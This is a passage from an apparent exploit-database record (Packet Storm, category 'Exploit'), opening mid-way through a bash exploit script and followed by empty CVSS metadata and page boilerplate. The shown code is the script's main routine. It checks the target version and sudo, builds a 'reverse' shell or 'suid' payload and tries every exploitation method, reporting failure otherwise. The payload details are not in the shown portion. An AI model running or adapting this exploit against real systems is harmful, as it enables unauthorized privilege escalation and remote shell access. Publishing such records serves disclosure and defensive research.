fi\n        \n        if [ \"$REVERSE\" = true ]; then\n            check_version && check_sudo && create_payload \"reverse\" && try_all_methods\n            if [ $? -eq 0 ] && [ \"$EXPLOIT_SUCCESS\" = false ]; then\n                echo -e \"${RED}[!] Exploit failed${NC}\"\n                exit 1\n            fi\n            exit 0\n        fi\n        \n        if [ \"$EXPLOIT\" = true ]; then\n            check_version && check_sudo && create_payload \"suid\" && try_all_methods\n            if [ $? -eq 0 ] && [ \"$EXPLOIT_SUCCESS\" = false ]; then\n                echo -e \"${RED}[!] Exploit failed${NC}\"\n                exit 1\n            fi\n            exit 0\n        fi\n        \n        show_help\n    }\n    \n    main \"$@\"\n    \t\n    Greetings to :======================================================================\n    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|\n    ====================================================================================",
    "sourceHref": "https://packetstorm.news/download/215862",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215862/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply